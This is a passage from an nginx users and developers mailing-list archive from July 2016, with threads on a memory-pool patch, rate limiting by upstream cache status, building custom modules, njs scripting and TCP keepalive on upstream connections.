1468859189 -28800 # Tue Jul 19 00:26:29 2016 +0800 # Node ID 45ef1e0a48a82b2a81db6bc447aaeb16a10056f9 # Parent 6acaa638fa074dada02ad4544a299584da9abc85 fix ngx_reset_pool diff --git a/src/core/ngx_palloc.c b/src/core/ngx_palloc.c --- a/src/core/ngx_palloc.c +++ b/src/core/ngx_palloc.c @@ -109,7 +109,8 @@ ngx_reset_pool(ngx_pool_t *pool) } for (p = pool; p; p = p->d.next) { - p->d.last = (u_char *) p + sizeof(ngx_pool_t); + p->d.last = (u_char *) p + + (p == pool ? sizeof(ngx_pool_t ) : sizeof(ngx_pool_data_t)); p->d.failed = 0; } -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Mon Jul 18 18:50:36 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 18 Jul 2016 21:50:36 +0300 Subject: fix ngx_reset_pool In-Reply-To: References: Message-ID: <20160718185036.GI57459@mdounin.ru> Hello! On Tue, Jul 19, 2016 at 12:38:58AM +0800, ??? wrote: > # HG changeset patch > # User Liang Sijian > # Date 1468859189 -28800 > # Tue Jul 19 00:26:29 2016 +0800 > # Node ID 45ef1e0a48a82b2a81db6bc447aaeb16a10056f9 > # Parent 6acaa638fa074dada02ad4544a299584da9abc85 > fix ngx_reset_pool > > diff --git a/src/core/ngx_palloc.c b/src/core/ngx_palloc.c > --- a/src/core/ngx_palloc.c > +++ b/src/core/ngx_palloc.c > @@ -109,7 +109,8 @@ ngx_reset_pool(ngx_pool_t *pool) > } > > for (p = pool; p; p = p->d.next) { > - p->d.last = (u_char *) p + sizeof(ngx_pool_t); > + p->d.last = (u_char *) p + > + (p == pool ? sizeof(ngx_pool_t ) : sizeof(ngx_pool_data_t)); > p->d.failed = 0; > } A previous attempt to "fix" this can be found here, it looks slightly better from my point of view: http://mailman.nginx.org/pipermail/nginx-devel/2010-June/000351.html Though we are quite happy with the current code, while it is not optimal - it is simple and good enough from practical point of view. -- Maxim Dounin http://nginx.org/ From linnading1989 at gmail.com Mon Jul 18 19:27:19 2016 From: linnading1989 at gmail.com (Linna.Ding) Date: Mon, 18 Jul 2016 15:27:19 -0400 Subject: Nginx $upstream_cache_status not available when used in rate limiting Message-ID: Hi, I use Nginx as reverse proxy, and I would like to rate limit the requests to origin server, but only limit the requests with cache status EXPIRED. I just tested with a map "cache_key", and the rate limiting doesn't work, the $cache_key was logged as empty string. But changing $upstream_cache_status to non-upstream variables like $remote_addr and adding an IP match value will make the rate limiting work. The zone I defined like so: limit_req_zone $cache_key zone=cache_host:1m rate=1r/m; map $upstream_cache_status $cache_key { EXPIRED $host; default ""; } I enabled cache setting in nginx.conf, and one of my server chunk uses the rate limit zone like below: limit_req zone=cache_host busrt=1; Is this because $upstream_cache_status value is set after the request is sent to origin server and got the response, while $cache_key is used in rate limit zone which checked before the request was sent to origin server? If so, is there a recommended way to implement rate limiting only for requests with specific cache status? Thanks! Linna -------------- next part -------------- An HTML attachment was scrubbed... URL: From pankajitbhu at gmail.com Tue Jul 19 09:44:32 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Tue, 19 Jul 2016 15:14:32 +0530 Subject: while building own nginx module error to find user defined header file In-Reply-To: <20160718130929.GA57459@mdounin.ru> References: <20160718130929.GA57459@mdounin.ru> Message-ID: Hi , Thank you, after using this script also i am getting same error. I have makefile which provide other header file path and third party lib path. I have structure like this module_folder/ 1.module.cpp 2.config 3.Makefile and having sub parent folder which contain other dependency code. so please let me know what i should do. On Mon, Jul 18, 2016 at 6:39 PM, Maxim Dounin wrote: > Hello! > > On Mon, Jul 18, 2016 at 12:28:34PM +0530, Pankaj Chaudhary wrote: > > > I have written my own nginx module and i have my user defined header > files > > but while building i am getting error header file not found. > > If you are using header files in your module, you have to add your > module directory to the list of include paths. > > Assuming you are using auto/module script to configure your > module, you should do something like this in your module ./config > script: > > ngx_module_type=HTTP_AUX_FILTER > ngx_module_name=ngx_http_example_filter_module > ngx_module_incs=$ngx_addon_dir > ngx_module_deps= > ngx_module_srcs=$ngx_addon_dir/ngx_http_example_filter_module.c > ngx_module_libs= > > . auto/module > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From pankajitbhu at gmail.com Wed Jul 20 09:03:28 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Wed, 20 Jul 2016 14:33:28 +0530 Subject: error nginx: [emerg] dlopen() "/usr/local/nginx/modules/ds_http_module.so" failed (/usr/local/nginx/modules/ds_http_module.so: undefined symbol: ds_http_module Message-ID: Hi All, I am getting error below error for own written module ds_http_module. nginx: [emerg] dlopen() "/usr/local/nginx/modules/ds_http_module.so" failed (/usr/local/nginx/modules/ds_http_module.so: undefined symbol: ds_http_module Please let me know what could be the reason of this error. Regards, Pankaj -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 20 09:33:18 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 20 Jul 2016 05:33:18 -0400 Subject: ngx_http_upstream_status_variable question Message-ID: <4ef2043a35fd8621f95435510b1f5a7e.NginxMailingListEnglish@forum.nginx.org> ngx_http_upstream_status_variable len = r->upstream_states->nelts * (3 + 2); write status to string, one status str len would be 3 in most case, like 200, 302, 404.... but if upstream multi times, may be add ' : ' as separator so, string len may be nelts*3 + (nelts-1)*3 = 6nelts - 3 != nelts * (3 + 2); what's wrong here? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268369,268369#msg-268369 From pankajitbhu at gmail.com Wed Jul 20 12:29:20 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Wed, 20 Jul 2016 17:59:20 +0530 Subject: while building own nginx module error to find user defined header file In-Reply-To: References: <20160718130929.GA57459@mdounin.ru> Message-ID: I have makefile which provide other header file path and third party lib path. I have structure like this module_folder/ 1.module.cpp 2.config 3.Makefile and having sub parent folder which contain other dependency code. so please let me know what i should do On Tue, Jul 19, 2016 at 3:14 PM, Pankaj Chaudhary wrote: > Hi , > Thank you, > > after using this script also i am getting same error. > I have makefile which provide other header file path and third party lib > path. > I have structure like this > module_folder/ > 1.module.cpp > 2.config > 3.Makefile > > and having sub parent folder which contain other dependency code. > > so please let me know what i should do. > > > > On Mon, Jul 18, 2016 at 6:39 PM, Maxim Dounin wrote: > >> Hello! >> >> On Mon, Jul 18, 2016 at 12:28:34PM +0530, Pankaj Chaudhary wrote: >> >> > I have written my own nginx module and i have my user defined header >> files >> > but while building i am getting error header file not found. >> >> If you are using header files in your module, you have to add your >> module directory to the list of include paths. >> >> Assuming you are using auto/module script to configure your >> module, you should do something like this in your module ./config >> script: >> >> ngx_module_type=HTTP_AUX_FILTER >> ngx_module_name=ngx_http_example_filter_module >> ngx_module_incs=$ngx_addon_dir >> ngx_module_deps= >> ngx_module_srcs=$ngx_addon_dir/ngx_http_example_filter_module.c >> ngx_module_libs= >> >> . auto/module >> >> -- >> Maxim Dounin >> http://nginx.org/ >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 20 14:03:55 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 20 Jul 2016 10:03:55 -0400 Subject: ngx_http_upstream_status_variable question In-Reply-To: <4ef2043a35fd8621f95435510b1f5a7e.NginxMailingListEnglish@forum.nginx.org> References: <4ef2043a35fd8621f95435510b1f5a7e.NginxMailingListEnglish@forum.nginx.org> Message-ID: <84e06d722fc691fe3b6b03fdd4dccd71.NginxMailingListEnglish@forum.nginx.org> also ngx_http_upstream_response_time_variable and ngx_http_upstream_response_length_variable, + 2 for separator if (state[i].peer) { *p++ = ','; *p++ = ' '; } else { *p++ = ' '; *p++ = ':'; *p++ = ' '; if (++i == r->upstream_states->nelts) { break; } continue; } it can be 3 bytes, right? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268369,268374#msg-268374 From pankajitbhu at gmail.com Wed Jul 20 14:12:58 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Wed, 20 Jul 2016 19:42:58 +0530 Subject: error while building own nginx module Message-ID: Hi i have written own nginx module and i have many header ,src and makefiles files . my nginx module folder structure look like below /product/src/nginx/ngx_http_auth_module.cpp /product/src/nginx/Makefile /product/src/nginx/config(nginx config file) /product/src/common/.cpp files /product/lib/.so files /product/src/utility/.c and .h files i have written my config file like this *************************************************************** ngx_module_type=HTTP_AUX_FILTER_MODULES ngx_module_name=ngx_http_auth_module ngx_module_incs=$ngx_addon_dir ngx_module_deps= ngx_module_srcs=$ngx_addon_dir/ngx_http_auth_module.cpp \ $ngx_addon_dir/Makefile ngx_module_libs= . auto/module *************************************************************************** code build successfully and generated ngx_http_auth_module.so file but not correctly since i am getting below error while loading in nginx.conf file. nginx: [emerg] dlopen() "/usr/local/nginx/modules/ngx_http_auth_module.so" failed (/usr/local/nginx/modules/ngx_http_auth_module.so: undefined symbol: ngx_http_auth_module Please let me know correct way to do. Thanks & Regards, Pankaj Chaudhary -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 20 14:39:42 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 20 Jul 2016 10:39:42 -0400 Subject: ngx_http_upstream_status_variable question In-Reply-To: <84e06d722fc691fe3b6b03fdd4dccd71.NginxMailingListEnglish@forum.nginx.org> References: <4ef2043a35fd8621f95435510b1f5a7e.NginxMailingListEnglish@forum.nginx.org> <84e06d722fc691fe3b6b03fdd4dccd71.NginxMailingListEnglish@forum.nginx.org> Message-ID: <74dbbd942b617d53d09b73dc5ef7bdaf.NginxMailingListEnglish@forum.nginx.org> figure it out, would jump one position for 3 bytes separator Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268369,268379#msg-268379 From nginx-forum at forum.nginx.org Wed Jul 20 18:03:44 2016 From: nginx-forum at forum.nginx.org (linnading) Date: Wed, 20 Jul 2016 14:03:44 -0400 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: References: Message-ID: <00a41c9f43f462570378fbed79b15105.NginxMailingListEnglish@forum.nginx.org> I assume $upstream_cache_status variable is set after requests are sent and responses are got. But is there a way to do do rate limiting ignoring cache? Really appreciate any help on this. Thanks. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268345,268383#msg-268383 From francis at daoine.org Wed Jul 20 18:16:23 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 20 Jul 2016 19:16:23 +0100 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <00a41c9f43f462570378fbed79b15105.NginxMailingListEnglish@forum.nginx.org> References: <00a41c9f43f462570378fbed79b15105.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160720181623.GS12280@daoine.org> On Wed, Jul 20, 2016 at 02:03:44PM -0400, linnading wrote: Hi there, > I assume $upstream_cache_status variable is set after requests are sent and > responses are got. But is there a way to do do rate limiting ignoring cache? > Really appreciate any help on this. I'm afraid that, having read the mails, I'm not at all sure what kind of limiting you want to do. If 10 requests come in at the same time to-or-from the same something, you want the last few requests to be delayed or rejected. What is the "something" that you care about? f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Wed Jul 20 18:52:10 2016 From: nginx-forum at forum.nginx.org (linnading) Date: Wed, 20 Jul 2016 14:52:10 -0400 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <20160720181623.GS12280@daoine.org> References: <20160720181623.GS12280@daoine.org> Message-ID: <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> Hi Francis, It is "to the same upstream server" that I care about. I would like to limit the request rate to the same upstream server. The Scenarios is like: 10 requests at the same time to the same upstream server, the upstream server should only receive requests at rate 1r/m. Last few requests will be delayed or rejected. But for these last few requests, some of them can be served by cache, they should not be delayed/rejected. Thanks, Linna Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268345,268386#msg-268386 From tfransosi at gmail.com Wed Jul 20 19:51:16 2016 From: tfransosi at gmail.com (Thiago Farina) Date: Wed, 20 Jul 2016 16:51:16 -0300 Subject: how can i get nginx lib In-Reply-To: References: Message-ID: On Mon, Jun 27, 2016 at 8:37 AM, Pankaj Chaudhary wrote: > > > Is there such thing? As far as I know it is distributed only as binary. -- Thiago Farina -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Wed Jul 20 21:28:39 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 20 Jul 2016 22:28:39 +0100 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> References: <20160720181623.GS12280@daoine.org> <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160720212839.GT12280@daoine.org> On Wed, Jul 20, 2016 at 02:52:10PM -0400, linnading wrote: Hi there, > It is "to the same upstream server" that I care about. I would like to > limit the request rate to the same upstream server. That makes sense, thanks. I am not aware of a way to achieve this directly in stock nginx. I see that there is a third-party module at https://github.com/cfsego/nginx-limit-upstream which looks like it aims to do what you want; and I see that nginx-plus has a "max_conns" value per server in an upstream block, documented at http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server If non-stock is ok for you, possibly one of those can work? > The Scenarios is like: > 10 requests at the same time to the same upstream server, the upstream > server should only receive requests at rate 1r/m. Last few requests will be > delayed or rejected. But for these last few requests, some of them can be > served by cache, they should not be delayed/rejected. I think that the limit_* directives implementation is such that the choice is made before the upstream is chosen; and there are no explicit limits on the connections to upstream. That is likely why the third-party module was created. Cheers, f -- Francis Daly francis at daoine.org From vbart at nginx.com Wed Jul 20 21:56:39 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 21 Jul 2016 00:56:39 +0300 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> References: <20160720181623.GS12280@daoine.org> <99d8a0c3111c147820a82d42e3bd4d44.NginxMailingListEnglish@forum.nginx.org> Message-ID: <6618836.ec03c104XX@vbart-laptop> On Wednesday 20 July 2016 14:52:10 linnading wrote: > Hi Francis, > > It is "to the same upstream server" that I care about. I would like to > limit the request rate to the same upstream server. > > The Scenarios is like: > 10 requests at the same time to the same upstream server, the upstream > server should only receive requests at rate 1r/m. Last few requests will be > delayed or rejected. But for these last few requests, some of them can be > served by cache, they should not be delayed/rejected. > [..] While "proxy_cache_lock" isn't what you're asking about, it can significantly reduce number of requests that reaches your upstream server. http://nginx.org/r/proxy_cache_lock wbr, Valentin V. Bartenev From maxim at nginx.com Thu Jul 21 07:26:42 2016 From: maxim at nginx.com (Maxim Konovalov) Date: Thu, 21 Jul 2016 10:26:42 +0300 Subject: Fwd: [njs] Updated README to reflect changes in HTTP and Stream modules. In-Reply-To: References: Message-ID: <1e2593e6-d46f-351c-adb8-2bfd03a83f7c@nginx.com> Hello, For those who doesn't follow njs project closely: Roman and Igor just added njs support to the stream module and moved js scripting to separate files. More details in the project README file you can find here: http://hg.nginx.org/njs/file/tip/README -------- Forwarded Message -------- Subject: [njs] Updated README to reflect changes in HTTP and Stream modules. Date: Wed, 20 Jul 2016 16:39:30 +0000 From: Roman Arutyunyan Reply-To: nginx-devel at nginx.org To: nginx-devel at nginx.org details: http://hg.nginx.org/njs/rev/3f8f801e2f53 branches: changeset: 125:3f8f801e2f53 user: Roman Arutyunyan date: Wed Jul 20 19:38:00 2016 +0300 description: Updated README to reflect changes in HTTP and Stream modules. diffstat: README | 225 +++++++++++++++++++++++++++++++++++++++++----------------------- 1 files changed, 144 insertions(+), 81 deletions(-) diffs (264 lines): diff -r 740defed7584 -r 3f8f801e2f53 README --- a/README Wed Jul 20 18:20:17 2016 +0300 +++ b/README Wed Jul 20 19:38:00 2016 +0300 @@ -1,5 +1,6 @@ -Configure nginx with HTTP JavaScript module using the --add-module option: +Configure nginx with HTTP and Stream JavaScript modules using the --add-module +option: ./configure --add-module=/nginx @@ -14,30 +15,39 @@ and add the following line to nginx.conf Please report your experiences to the NGINX development mailing list nginx-devel at nginx.org (http://mailman.nginx.org/mailman/listinfo/nginx-devel). -JavaScript objects ------------------- -$r -|- uri -|- method -|- httpVersion -|- remoteAddress -|- headers{} -|- args{} -|- response - |- status - |- headers{} - |- contentType - |- contentLength - |- sendHeader() - |- send(data) - |- finish() +HTTP JavaScript module +---------------------- + +Each HTTP JavaScript handler receives two arguments - request and response. + + function foo(req, res) { + .. + } + +The following properties are available: + +req + - uri + - method + - httpVersion + - remoteAddress + - headers{} + - args{} + - variables{} + - log() + +res + - status + - headers{} + - contentType + - contentLength + - sendHeader() + - send() + - finish() -Example -------- - -Create nginx.conf: +Example nginx.conf: worker_processes 1; pid logs/nginx.pid; @@ -47,79 +57,132 @@ Create nginx.conf: } http { - js_set $summary " - var a, s, h; - - s = 'JS summary\n\n'; - - s += 'Method: ' + $r.method + '\n'; - s += 'HTTP version: ' + $r.httpVersion + '\n'; - s += 'Host: ' + $r.headers.host + '\n'; - s += 'Remote Address: ' + $r.remoteAddress + '\n'; - s += 'URI: ' + $r.uri + '\n'; - - s += 'Headers:\n'; - for (h in $r.headers) { - s += ' header \"' + h + '\" is \"' + $r.headers[h] + '\"\n'; - } - - s += 'Args:\n'; - for (a in $r.args) { - s += ' arg \"' + a + '\" is \"' + $r.args[a] + '\"\n'; - } - - s; - "; + # include JavaScript file + js_include js-http.js; server { listen 8000; location / { - js_run " - var res; - res = $r.response; - res.headers.foo = 1234; - res.status = 302; - res.contentType = 'text/plain; charset=utf-8'; - res.contentLength = 15; - res.sendHeader(); - res.send('nginx'); - res.send('java'); - res.send('script'); - res.finish(); - "; + # create $foo variable and set JavaScript function foo() + # from the included JavaScript file as its handler + js_set $foo foo; + + add_header X-Foo $foo; + + # register JavaScript function bar() as content handler + js_content baz; } location /summary { + js_set $summary summary; + return 200 $summary; } } } -Run nginx & test the output: - -$ curl 127.0.0.1:8000 - -nginxjavascript - -$ curl -H "Foo: 1099" '127.0.0.1:8000/summary?a=1&fooo=bar&zyx=xyz' - -JS summary -Method: GET -HTTP version: 1.1 -Host: 127.0.0.1:8000 -Remote Address: 127.0.0.1 -URI: /summary -Headers: - header "Host" is "127.0.0.1:8000" - header "User-Agent" is "curl/7.43.0" - header "Accept" is "*/*" - header "Foo" is "1099" -Args: - arg "a" is "1" - arg "fooo" is "bar" - arg "zyx" is "xyz" +js-http.js: + + function foo(req, res) { + req.log("hello from foo() handler"); + return "foo"; + } + + function summary(req, res) { + var a, s, h; + + s = "JS summary\n\n"; + + s += "Method: " + req.method + "\n"; + s += "HTTP version: " + req.httpVersion + "\n"; + s += "Host: " + req.headers.host + "\n"; + s += "Remote Address: " + req.remoteAddress + "\n"; + s += "URI: " + req.uri + "\n"; + + s += "Headers:\n"; + for (h in req.headers) { + s += " header '" + h + "' is '" + req.headers[h] + "'\n"; + } + + s += "Args:\n"; + for (a in req.args) { + s += " arg '" + a + "' is '" + req.args[a] + "'\n"; + } + + return s; + } + + function baz(req, res) { + res.headers.foo = 1234; + res.status = 200; + res.contentType = "text/plain; charset=utf-8"; + res.contentLength = 15; + res.sendHeader(); + res.send("nginx"); + res.send("java"); + res.send("script"); + + res.finish(); + } + + +Stream JavaScript module +------------------------ + +Each Stream JavaScript handler receives one argument - stream session object. + + function foo(s) { + .. + } + +The following properties are available in the session object: + + - remoteAddress + - variables{} + - log() + + +Example nginx.conf: + + worker_processes 1; + pid logs/nginx.pid; + + events { + worker_connections 256; + } + + stream { + # include JavaScript file + js_include js-stream.js; + + server { + listen 8000; + + # create $foo and $bar variables and set JavaScript + # functions foo() and bar() from the included JavaScript + # file as their handlers + js_set $foo foo; + js_set $bar bar; + + return $foo-$bar; + } + } + + +js-stream.js: + + function foo(s) { + s.log("hello from foo() handler!"); + return s.remoteAddress; + } + + function bar(s) { + var v = s.variables; + s.log("hello from bar() handler!"); + return "foo-var" + v.remote_port + "; pid=" + v.pid; + } -- _______________________________________________ nginx-devel mailing list nginx-devel at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx-devel -- Maxim Konovalov From nginx-forum at forum.nginx.org Thu Jul 21 14:51:41 2016 From: nginx-forum at forum.nginx.org (linnading) Date: Thu, 21 Jul 2016 10:51:41 -0400 Subject: Nginx $upstream_cache_status not available when used in rate limiting In-Reply-To: <6618836.ec03c104XX@vbart-laptop> References: <6618836.ec03c104XX@vbart-laptop> Message-ID: <542be2f422bff68aff468e6a9cfa8135.NginxMailingListEnglish@forum.nginx.org> Thanks Francis and Valentin! These options can help a lot to limit requests to upstream server, thought not related to rate limiting. Thanks! ~L Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268345,268404#msg-268404 From zxcvbn4038 at gmail.com Thu Jul 21 20:07:26 2016 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Thu, 21 Jul 2016 16:07:26 -0400 Subject: how can i get nginx lib In-Reply-To: References: Message-ID: You can get the nginx source code from here: http://nginx.org/ Or here: https://github.com/nginx/nginx On Wed, Jul 20, 2016 at 3:51 PM, Thiago Farina wrote: > > > On Mon, Jun 27, 2016 at 8:37 AM, Pankaj Chaudhary > wrote: > >> >> >> Is there such thing? As far as I know it is distributed only as binary. > > -- > Thiago Farina > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From adityaumrani at gmail.com Fri Jul 22 02:02:48 2016 From: adityaumrani at gmail.com (Aditya Umrani) Date: Thu, 21 Jul 2016 19:02:48 -0700 Subject: so_keepalive option for outbound sockets Message-ID: Hello, I've configured the so_keepalive option for a server (this is also my default server). I do have other server configs listening to the same port. ======== listen 9822 default_server so_keepalive=on; listen 29822 ssl http2 default_server so_keepalive=on; ======== My sysctl settings are set to : ======== net.ipv4.tcp_keepalive_time = 120 net.ipv4.tcp_keepalive_probes = 10 net.ipv4.tcp_keepalive_intvl = 120 ======== However, I see that no tcp keepalive packets are being sent on outbound connections (from nginx to the upstream). I also checked the output of 'netstat -an --timers' I see that no outbound sockets have the 'keepalive' flag. All of them are 'off'. If it matters, the server config which actually servers this request is not the default one, but one of the other configs. I took a quick look at the code and the 'SO_KEEPALIVE' options only shows up on functions which deal with listening sockets. Does this mean that nginx does not honor this option for outbound connections? Thanks, Aditya From pankajitbhu at gmail.com Fri Jul 22 03:09:52 2016 From: pankajitbhu at gmail.com (Pankaj Chaudhary) Date: Fri, 22 Jul 2016 08:39:52 +0530 Subject: how i can use third party library while building own nginx module Message-ID: Hi, how i can use third party library while building own nginx module as i am using third party libraries. Thanks, Pankaj -------------- next part -------------- An HTML attachment was scrubbed... URL: From mostolog at gmail.com Fri Jul 22 06:22:18 2016 From: mostolog at gmail.com (mostolog at gmail.com) Date: Fri, 22 Jul 2016 08:22:18 +0200 Subject: Using variables on configuration (map?) for regex Message-ID: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> Hi I'm trying to /clean/ up a config file and I'm having a headache trying to do it. Consider the following scenario: * Users from group gfoo must be allowed to GET URL foo, while adminfoo must be able to POST * Users from group gbar must be allowed to GET URL bar, while adminbar must be able to POST * ...and so on for ~50 groups. The configuration at this moment is similar to: server { listen 80; server_name foo.domain.com; location ~ /content/foo { if ($denied_foo) { return 403 "Forbidden"; } ... } location ~ /page/bar/action...and ~10 locations more per server... } server { listen 80; server_name bar.domain.com; location ~ /content/bar { if ($denied_bar) { return 403 "Forbidden"; } ... } location ~ /page/bar/action...and ~10 locations more per server... } ...~200 whatever.domain.com servers more map $request_method:$request_uri:$http_groups $denied_foo { default 1; ~^GET:/content/foo:gfoo 0; ~^POST:/content/foo:adminfoo 0; } map $request_method:$request_uri:$http_groups $denied_bar { default 1; ~^GET:/content/bar:gbat 0; ~^POST:/content/bar:adminbar 0; } ...lots of map directives I'll like to be able to simplify it doing something like: server_name (?.*)\.domain\.com; ... map $request_method:$request_uri:$http_groups $denied { default 1; ~^GET:/content/$myvar:g$myvar 0; ~^POST:/content/$myvar:admin$myvar 0; } I have even tried using an auxiliary map this way: map $servername $myvar { ~^(?.*)\.domain\.com $v; } map $request_method:$request_uri:$http_groups $denied { default 1; ~^GET:/content/$myvar:g$myvar 0; ~^POST:/content/$myvar:admin$myvar 0; } But I haven't succeeded so far. Could you help me? Having ~200 configuration files doesn't seem a good option, so omit "on-build config with script parameters" Thanks in advance, Regards. -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Fri Jul 22 07:00:24 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 22 Jul 2016 08:00:24 +0100 Subject: how i can use third party library while building own nginx module In-Reply-To: References: Message-ID: <20160722070024.GU12280@daoine.org> On Fri, Jul 22, 2016 at 08:39:52AM +0530, Pankaj Chaudhary wrote: Hi there, > how i can use third party library while building own nginx module as i am > using third party libraries. Do you know the compiler command-line that you would need to build your module with the third party library, if nginx were not involved? (It probably includes a "-l" argument, and possibly "-L" and "-I" as well.) If you look at, for example, auto/lib/geoip/conf or auto/lib/openssl/conf in the nginx source, does that show you how to set things like nginx_feature_libs and CORE_LIBS in your module "config" file, in order that nginx will use a similar compiler command-line? Good luck with it, f -- Francis Daly francis at daoine.org From mdounin at mdounin.ru Fri Jul 22 14:32:46 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 22 Jul 2016 17:32:46 +0300 Subject: so_keepalive option for outbound sockets In-Reply-To: References: Message-ID: <20160722143246.GX57459@mdounin.ru> Hello! On Thu, Jul 21, 2016 at 07:02:48PM -0700, Aditya Umrani wrote: > Hello, > > I've configured the so_keepalive option for a server (this is also my > default server). I do have other server configs listening to the same > port. > ======== > listen 9822 default_server so_keepalive=on; > listen 29822 ssl http2 default_server so_keepalive=on; > ======== > > My sysctl settings are set to : > ======== > net.ipv4.tcp_keepalive_time = 120 > net.ipv4.tcp_keepalive_probes = 10 > net.ipv4.tcp_keepalive_intvl = 120 > ======== > > However, I see that no tcp keepalive packets are being sent on > outbound connections (from nginx to the upstream). I also checked the > output of 'netstat -an --timers' I see that no outbound sockets have > the 'keepalive' flag. All of them are 'off'. If it matters, the server > config which actually servers this request is not the default one, but > one of the other configs. > I took a quick look at the code and the 'SO_KEEPALIVE' options only > shows up on functions which deal with listening sockets. Does this > mean that nginx does not honor this option for outbound connections? Yes. The so_keepalive parameter is configured on listening sockets and applies to connections accepted though these sockets. Using SO_KEEPALIVE on sockets to backends are not generally needed, as these connections are usually local and well-controlled. (And if it's not the case, many operation systems have an option to request TCP keepalive for all connection, like net.inet.tcp.always_keepalive on FreeBSD. Though looks like Linux isn't able to do so.) -- Maxim Dounin http://nginx.org/ From adityaumrani at gmail.com Fri Jul 22 16:54:59 2016 From: adityaumrani at gmail.com (Aditya Umrani) Date: Fri, 22 Jul 2016 09:54:59 -0700 Subject: so_keepalive option for outbound sockets In-Reply-To: <20160722143246.GX57459@mdounin.ru> References: <20160722143246.GX57459@mdounin.ru> Message-ID: Hi, Thanks for your prompt reply. On Fri, Jul 22, 2016 at 7:32 AM, Maxim Dounin wrote: > Hello! > > On Thu, Jul 21, 2016 at 07:02:48PM -0700, Aditya Umrani wrote: > >> Hello, >> >> I've configured the so_keepalive option for a server (this is also my >> default server). I do have other server configs listening to the same >> port. >> ======== >> listen 9822 default_server so_keepalive=on; >> listen 29822 ssl http2 default_server so_keepalive=on; >> ======== >> >> My sysctl settings are set to : >> ======== >> net.ipv4.tcp_keepalive_time = 120 >> net.ipv4.tcp_keepalive_probes = 10 >> net.ipv4.tcp_keepalive_intvl = 120 >> ======== >> >> However, I see that no tcp keepalive packets are being sent on >> outbound connections (from nginx to the upstream). I also checked the >> output of 'netstat -an --timers' I see that no outbound sockets have >> the 'keepalive' flag. All of them are 'off'. If it matters, the server >> config which actually servers this request is not the default one, but >> one of the other configs. >> I took a quick look at the code and the 'SO_KEEPALIVE' options only >> shows up on functions which deal with listening sockets. Does this >> mean that nginx does not honor this option for outbound connections? > > Yes. The so_keepalive parameter is configured on listening > sockets and applies to connections accepted though these sockets. > > Using SO_KEEPALIVE on sockets to backends are not generally > needed, as these connections are usually local and > well-controlled. (And if it's not the case, many operation > systems have an option to request TCP keepalive for all > connection, like net.inet.tcp.always_keepalive on FreeBSD. > Though looks like Linux isn't able to do so.) I will give it a shot through some LD_PRELOAD tricks. Let me know if anyone has other suggestions. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx Aditya From francis at daoine.org Sat Jul 23 08:28:19 2016 From: francis at daoine.org (Francis Daly) Date: Sat, 23 Jul 2016 09:28:19 +0100 Subject: Using variables on configuration (map?) for regex In-Reply-To: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> References: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> Message-ID: <20160723082819.GV12280@daoine.org> On Fri, Jul 22, 2016 at 08:22:18AM +0200, mostolog at gmail.com wrote: Hi there, there are a few different questions that you might be asking, and I'm not certain which one you are actually asking. So I'll guess; if I guess wrong, do feel free to reply with other details. > I'm trying to /clean/ up a config file and I'm having a headache > trying to do it. The quick question/answer from the Subject line: if you are asking: how do I use a $variable in the "does this match" part of a "map"; the answer is "you don't". $ is either a literal character (in a string), or the end-of-string metacharacter (in a regex). > Consider the following scenario: > > * Users from group gfoo must be allowed to GET URL foo, while adminfoo > must be able to POST > * Users from group gbar must be 